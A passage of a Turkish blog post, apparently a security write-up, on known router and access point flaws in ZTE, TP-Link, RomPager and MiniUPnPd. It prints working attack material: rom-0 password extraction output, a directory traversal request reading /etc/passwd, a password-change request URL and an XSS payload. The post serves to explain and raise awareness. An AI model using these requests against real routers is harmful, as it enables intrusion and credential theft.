\n\n \npython rom0-decomp.py<\/span><\/p>\n\n[+] ZTE, TP-Link, ZynOS, Huawei rom-0 Configuration Decompressor<\/span><\/p>\n\n[+] Author: Osanda Malith Jayathissa<\/span><\/p>\n\n[+] Special thanks to Nick Knight<\/span><\/p>\n <\/span><\/p>\n\n[*] Opeining rom-0 file<\/span><\/p>\n\n[+] Dump:<\/span><\/p>\n\n\ufffd\ufffd\ufffd\ufffd<\/span> <\/span><\/span>l<\/span> <\/span><\/span>ttnetZTE60publicpublicpublic\ufffdPPP\ufffdP\ufffdP\ufffdP\ufffd5\ufffdP\ufffdP\ufffd<\/span><\/span><\/p>\n\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\ufffd<\/span><\/p>\n\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0@<\/span><\/p>\n <\/span><\/p>\n\n[+] Filtered Strings: <\/span> <\/span><\/span>l<\/span> <\/span><\/span>ttnetZTE60publicpublicpublicPPPPPP5PP@<\/span><\/span><\/p>\n <\/span><\/p>\n\n[~] Router Password is: <\/span>ttnet<\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nAyn\u0131 bir modemde ikinci bir zafiyet kullan\u0131larak WAN parolas\u0131 ele ge\u00e7irilebilmektedir. Bunun i\u00e7in modem aray\u00fcz\u00fcne yukar\u0131da ele ge\u00e7irilen admin parolas\u0131 kullan\u0131larak eri\u015filir. Interface setup, \u0130nternet sekmesine sa\u011f t\u0131klan\u0131p \u00e7er\u00e7eve kaynak kodu g\u00f6r\u00fcnt\u00fclendi\u011finde PPPoE\/PPPoA parolas\u0131 elde edilebilmektedir.<\/span><\/p>\n\n <\/span><\/div>\n <\/b> \n<\/span><\/p>\n\n <\/span><\/div>\n <\/span><\/b><\/p>\n\nTP-Link<\/b><\/span> \u0130kinci bir \u00f6rnek olarak TP-Link TL-WA701N \u00a0modeli 3.12.6 Build 110210 Rel.37112n firmware \u00fczerinde Directory Traversal tipi atak tespit edilmi\u015f. Bu atak istismar edilerek \/etc\/passwd dosyas\u0131 okunabilmektedir.<\/span><\/p>\n <\/b> \n<\/span><\/p>\n\n\u0130stek<\/span><\/p>\n\n \n\n<\/colgroup>\n\n\n\n \nGET \/help\/..\/..\/etc\/passwd HTTP\/1.1<\/span><\/p>\n\nHost: 192.168.178.2<\/span><\/p>\n\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko\/20100101 Firefox\/14.0.1<\/span><\/p>\n\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<\/span><\/p>\n\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3<\/span><\/p>\n\nAccept-Encoding: gzip, deflate<\/span><\/p>\n\nProxy-Connection: keep-alive<\/span><\/p>\n\nReferer: http:\/\/192.168.178.2\/help\/<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nCevap<\/span><\/p>\n\n \n\n<\/colgroup>\n\n\n\n \nHTTP\/1.1 200 OK<\/span><\/p>\n\nServer: TP-LINK Router<\/span><\/p>\n\nConnection: close<\/span><\/p>\n\nWWW-Authenticate: Basic realm=”TP-LINK Wireless Lite N Access Point WA701N”<\/span><\/p>\n\nContent-Type: text\/html<\/span><\/p>\n <\/span><\/p>\n\n<META http-equiv=Content-Type content=”text\/html; charset=iso-8859-1″><\/span><\/p>\n\n<HTML><\/span><\/p>\n\n<HEAD><TITLE>TL-WA701N<\/TITLE><\/span><\/p>\n\n<META http-equiv=Pragma content=no-cache><\/span><\/p>\n\n<META http-equiv=Expires content=”wed, 26 Feb 1997 08:21:57 GMT”><\/span><\/p>\n\n<LINK href=”\/dynaform\/css_help.css” rel=stylesheet type=”text\/css”><\/span><\/p>\n\n<SCRIPT language=”javascript” type=”text\/javascript”><!–<\/span><\/p>\n\nif(window.parent == window)window.location.href=”http:\/\/192.168.178.2″;<\/span><\/p>\n\nfunction Click() return false;<\/span><\/p>\n\ndocument.oncontextmenu=Click;<\/span><\/p>\n\nfunction doPrev()history.go(-1);<\/span><\/p>\n\n\/\/–><\/SCRIPT><\/span><\/p>\n\nroot:x:0:0:root:\/root:\/bin\/sh<\/span><\/p>\n\nAdmin:x:0:0:root:\/root:\/bin\/sh<\/span><\/p>\n\nbin:x:1:1:bin:\/bin:\/bin\/sh<\/span><\/p>\n\ndaemon:x:2:2:daemon:\/usr\/sbin:\/bin\/sh<\/span><\/p>\n\nadm:x:3:4:adm:\/adm:\/bin\/sh<\/span><\/p>\n\nlp:x:4:7:lp:\/var\/spool\/lpd:\/bin\/sh<\/span><\/p>\n\nsync:x:5:0:sync:\/bin:\/bin\/sync<\/span><\/p>\n\nshutdown:x:6:11:shutdown:\/sbin:\/sbin\/shutdown<\/span><\/p>\n\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt<\/span><\/p>\n\nuucp:x:10:14:uucp:\/var\/spool\/uucp:\/bin\/sh<\/span><\/p>\n\noperator:x:11:0:Operator:\/var:\/bin\/sh<\/span><\/p>\n\nnobody:x:65534:65534:nobody:\/home:\/bin\/sh<\/span><\/p>\n\nap71:x:500:0:Linux User,,,:\/root:\/bin\/sh<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nZafiyet kullan\u0131c\u0131 ad\u0131, parola de\u011fi\u015ftirme \u015feklinde farkl\u0131 atak vekt\u00f6rleriyle istismar edilebilir.<\/span><\/p>\n <\/b> \n<\/span><\/p>\n\n\u0130stek<\/span><\/p>\n\n \n\n<\/colgroup>\n\n\n\n \nhttp:\/\/192.168.178.2\/userRpm\/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX<\/span><\/p>\n\n&newpassword2=XXXX&Save=Save<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nVeya XSS ile MAC filtreleme ayarlar\u0131 de\u011fi\u015ftirilebilir.<\/span><\/p>\n <\/b> \n<\/span><\/p>\n\n\u0130stek<\/span><\/p>\n<\/p>\n <\/p>\n \n \n\n<\/colgroup>\n\n\n\n \nhttp:\/\/192.168.178.2\/userRpm\/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&<\/span><\/p>\n\nType=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n <\/span><\/div>\n\nMisfortune Cookie<\/span><\/b><\/p>\n\n CVE-2014-9222 kodlu misfortune cookie zafiyeti, sald\u0131rganlara AP \u00fczerinde kimlik do\u011frulamas\u0131z Administrator haklar\u0131 vermektedir. RomPager isimli g\u00f6m\u00fcl\u00fc web sunucuda ke\u015ffedilen bu zafiyet 200’den fazla modelde mevcuttur. Sald\u0131rganlar bu zafiyeti istismar ederek t\u00fcm trafi\u011fi izleyebilirler. [<\/span>Link]<\/span><\/div>\n\nUPNP<\/b><\/span><\/span><\/p>\n\n \n \nElektronik cihazlar\u0131n kolayca a\u011fa dahil olmas\u0131 ve birbirleriyle uyumlu \u00e7al\u0131\u015fabilmesi amac\u0131yla kullan\u0131lan bir servis olan UPnP \u00fczerinde de bilinen kritik bir zafiyet vard\u0131r. Bu zafiyet istismar edilerek WAN \u00fczerinden AP’ye uzaktan ba\u011flant\u0131 sa\u011flanabilir, cihazdan yap\u0131land\u0131rma dosyalar\u0131 \u00e7ekilebilir.\u00a0<\/span><\/p>\n\n <\/p>\nBGA\u2019dan Onur ALANBEL<\/span>\u2019in MiniUPnPd \u00fczerindeki bir zafiyet i\u00e7in yazd\u0131\u011f\u0131 istismar kodu, T\u00fcrkiye\u2019de yayg\u0131n olarak kullan\u0131lan modemlere root haklar\u0131yla ba\u011flanarak t\u00fcm trafi\u011fi y\u00f6nlendirme, yap\u0131land\u0131rma dosyalar\u0131na eri\u015fim, vb. ataklar yap\u0131labilece\u011fini g\u00f6stermi\u015ftir. Bulunan y\u0131\u011f\u0131n ta\u015fmas\u0131 zafiyeti istismar edilerek tam yetkili eri\u015fim sa\u011flanan \u00f6rnek \u00e7al\u0131\u015fmaya https:\/\/www.exploit-db.com\/docs\/36806.pdf adresinden eri\u015filebilir. \u0130stismar kodlar\u0131na ise https:\/\/www.exploit-db.com\/exploits\/36839\/<\/span> bu ba\u011flant\u0131dan ula\u015f\u0131labilir.<\/span><\/div>\n<\/div>\n<\/div>\n\nFurkan SANDAL<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"AP\/Router \u00dczerinde \u00c7\u0131kan Zafiyetler Access Point arabirimi, yaz\u0131l\u0131m\u0131 (firmware) di\u011fer bir\u00e7ok a\u011f cihaz\u0131 gibi g\u00fcvenlik zafiyetleri bar\u0131nd\u0131rabilirler. Bu zafiyetler ve…<\/p>\n","protected":false},"author":1,"featured_media":494,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[78,76,88,89,26,83,81,79,82,77,80,84,85,87,86],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/fiziksel_guvenlik.jpg?fit=227%2C226&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-7X","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/493"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=493"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/493\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/494"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=493"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=493"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
|
|
|
|
|